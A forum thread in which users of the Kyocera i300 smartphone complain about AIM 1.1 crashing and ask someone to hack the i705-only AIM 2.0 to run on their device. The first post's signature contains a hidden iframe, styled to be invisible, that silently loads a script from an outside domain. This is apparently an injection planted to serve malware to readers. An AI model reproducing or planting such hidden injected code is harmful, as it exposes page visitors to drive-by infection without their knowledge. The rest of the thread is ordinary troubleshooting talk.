+ Reply to Thread

Question AIM 2.0 for i705 - work on i300?

Hey

A while back, I had to delete AIM 1.1 because it kept crashing my i300. I noticed that AIM 2.0 exists for the i705.. and the i705 only! I downloaded a copy from Palm, and it HotSynced OK, but when you try to run it on the i300, a window pops up and says it only runs on the i705! D'OH!
    I was wondering if some genius out there would be willing to hack AOL 2.0 for i705 to get it to work on the i300? If you need a copy to do so, let me know!

Thanks!!

-Erby<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    -Erby

Administrator

Arrow

why cant you use the latest one out there? i have used it with no crashes...

Where can I get the latest one? I've looked everywhere. Version 1.1 crashed my phone as well.

Administrator

Arrow

if you want the AIM messenger app, you can go to aol.com and the AIM clients link is at the bottom...

youare referring to the AIM client correct?

aim 1.1

AIM 1.1 has never worked on my I300. It says my password is invalid when I have checked and rechecked and know it is correct. I would be interested in a 2.0 AIM.. Can anyone get this running on I300???

AIM 1.1 works fine on my I300 .. just FYI

use it all the time

dld

Angry aim 1.1 sucks

Its just plain bad, that piece of crap corrupted my phone every time.

It worked for a little while but suddenly and for no reason it would die.

I wish they'd make Trillian for it.

when i first purchased the phone almost a year ago, AIM worked, but now it does not work, it conflicts with some program. If i recall correctly, it refuses to work even if it is the only program installed...I dont know what is causing this. Having installed it without installing any other programs rules out the possibility that it is conficting with another program, and the fact that it USED to work really baffles me.

I have a copy of AIM 2.0 (you can get it from Palm, but is sorta hard to find) and if anyone is willing to work on it (cough cough...Jake... cough cough) that would be sweet. I'm in college, I'd pay someone, but I eat ketchup from the free packets at fast food places and Ramen noodles, so I can't really afford to pay anyone. It would be sweet to see who could do it first!

-Jason
    -Erby